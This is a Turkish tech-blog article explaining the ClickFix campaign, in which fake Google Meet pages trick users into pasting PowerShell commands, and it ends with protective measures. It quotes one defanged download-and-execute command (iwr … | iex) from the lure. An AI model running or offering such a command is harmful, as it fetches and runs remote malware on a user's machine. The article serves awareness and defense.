Google Meet Clickfix PowerShell Kötü Amaçlı Yazılımı Nasıl Yayılıyor?

yazar

clickfix-

Siber saldırganlar her geçen gün daha da sofistike yöntemlerle kullanıcıları hedef almaya devam ediyor. Son dönemde tespit edilen ve “ClickFix” adı verilen yeni bir saldırı kampanyası, Google Meet PowerShell kötü amaçlı yazılımı üzerinden kullanıcıları kandırarak sistemlerine sızıyor. Bu saldırı, yalnızca teknik araçlar değil, aynı zamanda gelişmiş sosyal mühendislik taktikleriyle de güvenliği tehdit ediyor.

Bu yazıda, ClickFix kampanyasının nasıl çalıştığını, hangi teknikleri kullandığını, nasıl yaygınlaştığını ve kendinizi bu tür tehditlerden nasıl koruyabileceğinizi detaylı bir şekilde ele alacağız.

1. Google Meet Güvenine Dayanan Sosyal Mühendislik

Google Meet, dünya genelinde milyonlarca kullanıcıya sahip, güvenilir bir video konferans platformu. Ancak bu güven duygusu, ClickFix saldırısında bir araç haline getirilmiş durumda.

Saldırganlar, meşru bir Google Meet toplantı davetiyesine benzeyen sahte e-postalar gönderiyor. Kullanıcı bu bağlantıya tıkladığında, gerçek Google Meet sayfasının neredeyse birebir kopyası olan sahte bir siteye yönlendiriliyor. Bu noktada geleneksel “kimlik avı” saldırılarından farklı olarak, kullanıcıdan e-posta adresi ya da şifre istenmiyor. Bunun yerine daha gelişmiş bir tuzak devreye giriyor.

2. “Mikrofon İzni Reddedildi” Aldatmacası

Kullanıcı sahte sayfaya ulaştığında, “Mikrofon İzni Reddedildi” şeklinde görünen sahte bir hata mesajıyla karşılaşıyor. Sayfa, bu sorunu düzeltmek için kullanıcıdan bir komutu terminaline yapıştırmasını istiyor.

İşte tam bu noktada kullanıcıya zararlı bir PowerShell komutu sunuluyor. Komut, kullanıcının kopyalayıp çalıştırması için sunuluyor ve bu da saldırının ana taşıyıcısı oluyor.

Örnek sahte komut:

powershell
powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing | iex # Verification ID: 116772

Bu komut, görünüşte basit gibi görünse de arka planda oldukça karmaşık ve tehlikeli bir işlev yürütüyor.

3. PowerShell Kodu Nasıl Çalışıyor?

Saldırganların sunduğu bu komutun iki ana bileşeni var:

  • iwr (Invoke-WebRequest): Saldırganın sunucusuna bağlanarak kötü amaçlı bir betiği indiriyor.

  • iex (Invoke-Expression): İndirilen betiği sistemde anında çalıştırıyor.

Bu işlem sonucunda, zararlı yazılım hiçbir dosya indirmeye gerek kalmadan, sistem belleğinde çalıştırılıyor. Bu teknik, geleneksel antivirüs yazılımlarını atlatmakta son derece etkilidir.

4. Bellek Tabanlı Saldırılar: Güvenlik Yazılımlarını Atlatmak

ClickFix kampanyası, özellikle bellek içi kötü amaçlı yazılım (fileless malware) tekniklerinden faydalanıyor. Bu tür saldırılarda:

  • Kalıcı dosyalar bırakılmaz.

  • Sistem belleği kullanılır.

  • Zararlı yazılım RAM üzerinde yürütülür.

Böylece antivirüs yazılımları ya da uç nokta koruma sistemleri zararlı yazılımı tespit etmekte zorlanır.

Ayrıca, saldırı sonrası indirilen bir toplu iş dosyası olan noanti-vm.bat dosyası da sisteme sızdırılır. Bu dosya, sanal makineleri ve analiz ortamlarını algılamaya çalışarak kendini korumaya alır.

5. Sahte Betikler ve Obfuscation (Gizleme) Teknikleri

ClickFix kampanyasında kullanılan PowerShell betikleri, obfuscation yani gizleme teknikleriyle yoğun biçimde şifrelenmiştir. Örnek olarak:

powershell
Add-Type -AssemblyName System.Windows.Forms;
[System.Windows.Forms.MessageBox]::Show('Verification complete!', 'Information', [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);

Bu sadece bir maskeleme kısmıdır. Asıl zararlı kod, değişken manipülasyonu ve dize bölme teknikleriyle gizlenmiştir.

clickfix-

6. Rat, Bilgi Hırsızları ve Kalıcı Tehditler

Bu PowerShell komutları çalıştırıldığında:

  • Bir RAT (Remote Access Trojan) sistemi ele geçirir.

  • Kullanıcının dosyalarına, kamerasına ve mikrofonuna uzaktan erişim sağlar.

  • Sisteme Lumma Stealer, DarkGate gibi bilgi hırsızları yüklenebilir.

  • Kullanıcı parolaları, kripto cüzdanları, çerezler gibi hassas bilgiler çalınabilir.

Ayrıca saldırganlar, sistem üzerinde kalıcı erişim sağlamak için yeni kullanıcı hesapları oluşturabilir, ağ kaynaklarına erişebilir ya da diğer sistemleri tarayabilir.

7. Kampanyayı Kimler Yürütüyor?

ClickFix kampanyası, Slavic Nation Empire ve Scamquerteo gibi organize siber suç gruplarına atfediliyor. Bu gruplar:

  • Altyapı şablonlarını paylaşır.

  • Araçlarını açık kaynak platformlarda satar veya kiralar.

  • Sosyal mühendislik taktiklerini profesyonel düzeyde uygular.

Bu da kampanyanın sıradan bir dolandırıcılık değil, çok daha organize bir tehdit olduğunu gösterir.

8. Neden Bu Kadar Tehlikeli?

ClickFix gibi saldırılar, otomatik tetiklenen zararlılardan farklı olarak kullanıcı eylemine dayanır. Kullanıcı, farkında olmadan kendi eliyle zararlı yazılımı sisteme yükler. Bu nedenle:

  • Antivirüs yazılımları komutu kötü niyetli olarak tanımlamayabilir.

  • Firewall (güvenlik duvarı) bu işlemleri meşru görebilir.

  • Kullanıcının eylemi olduğu için iz bırakması zordur.

9. ClickFix’e Karşı Alınabilecek Önlemler

A. Teknik Önlemler

  • PowerShell Execution Policy: Yalnızca imzalı komut dosyalarının çalışmasına izin verin.

  • Application Control: Yalnızca izin verilen yazılımların çalışmasına müsaade edin.

  • E-posta Güvenlik Sistemleri: Kimlik avı tespit sistemleri kullanın.

  • Web İçerik Filtresi: Bilinen zararlı alan adlarına erişimi engelleyin.

B. Kullanıcı Bilinçlendirme

  • Tanımadığınız kişilerden gelen toplantı davetlerine dikkat edin.

  • Size komut satırı üzerinden bir işlem yaptırmak isteyen web sitelerine güvenmeyin.

  • Bilgisayarınızda teknik bir sorun olduğuna dair uyarılar varsa, mutlaka IT uzmanına danışın.

  • Asla bilinmeyen bir komutu terminalinize yapıştırmayın!

clickfix

10. Gerçek Hayatta Ne Yapabilirsiniz?

Kurumlar ve bireyler için öneriler:

  • IT ekipleri, kullanıcıları bu tür sahte toplantı sayfalarına karşı düzenli olarak eğitmeli.

  • Saldırının teknik detayları güvenlik politikalarına entegre edilmeli.

  • Güvenlik olay günlüğü (SIEM) sistemleri, kullanıcı bazlı PowerShell çağrılarını dikkatle izlemeli.

  • Şüpheli alan adları düzenli olarak karalisteye alınmalı.

Google Meet PowerShell Kötü Amaçlı Yazılımına Karşı Tetikte Olun

Google Meet PowerShell kötü amaçlı yazılımı, kullanıcı güvenini suistimal eden sofistike ve etkili bir saldırı vektörüdür. Sosyal mühendislik ile başlayan, gelişmiş PowerShell komutlarıyla devam eden bu saldırılar, bireyler ve kurumlar için ciddi güvenlik tehditleri oluşturur.

Teknoloji ne kadar gelişirse gelişsin, insan faktörü hâlâ en zayıf halkadır. Bu nedenle kullanıcıların bilinçlendirilmesi ve çok katmanlı güvenlik önlemlerinin uygulanması, saldırılara karşı en etkili savunmadır.

Google Meet Clickfix PowerShell Kötü Amaçlı Yazılımı Nasıl Yayılıyor? yazısı ilk önce BeeTekno | Güncel Teknoloji Haberleri ve İncelemeler yayınlanmıştır.